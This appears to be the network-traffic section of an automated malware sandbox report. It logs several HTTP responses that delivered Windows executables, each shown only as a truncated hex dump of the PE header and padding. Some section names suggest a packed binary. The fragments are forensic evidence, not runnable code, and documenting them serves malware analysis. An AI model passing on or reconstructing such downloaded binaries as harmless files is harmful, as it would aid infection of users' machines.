Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:14:22 GMTContent-Type: application/octet-streamContent-Length: 3258368Last-Modified: Sun, 10 Nov 2024 23:54:02 GMTConnection: keep-aliveETag: "6731479a-31b800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 31 00 00 04 00 00 05 28 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 ad 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 ad 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 78 63 75 73 73 62 64 00 00 2b 00 00 b0 06 00 00 fe 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 73 64 6a 6e 6e 62 00 10 00 00 00 b0 31 00 00 04 00 00 00 92 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 31 00 00 22 00 00 00 96 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Mon, 11 Nov 2024 00:15:09 GMTContent-Type: application/octet-streamContent-Length: 2900584Last-Modified: Mon, 11 Nov 2024 00:05:30 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "67314a4a-2c4268"Expires: Wed, 11 Dec 2024 00:15:09 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 d5 49 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 92 00 00 00 84 2b 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2c 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 ca 00 00 3c 00 00 00 00 80 2c 00 78 03 00 00 00 50 2c 00 98 01 00 00 00 1a 2c 00 68 28 00 00 00 90 2c 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b0 00 00 28 00 00 00 10 b4 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 cc 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b6 90 00 00 00 10 00 00 00 92 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d0 21 00 00 00 b0 00 00 00 22 00 00 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 68 2b 00 00 e0 00 00 00 56 2b 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 98 01 00 00 00 50 2c 00 00 02 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 60 2c 00 00 02 00 00 00 10 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 70 2c 00 00 02 00 00 00 12 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 80 2c 00 00 04 00 00 00 14 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 90 2c 00 00 02 00 00 00 18 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
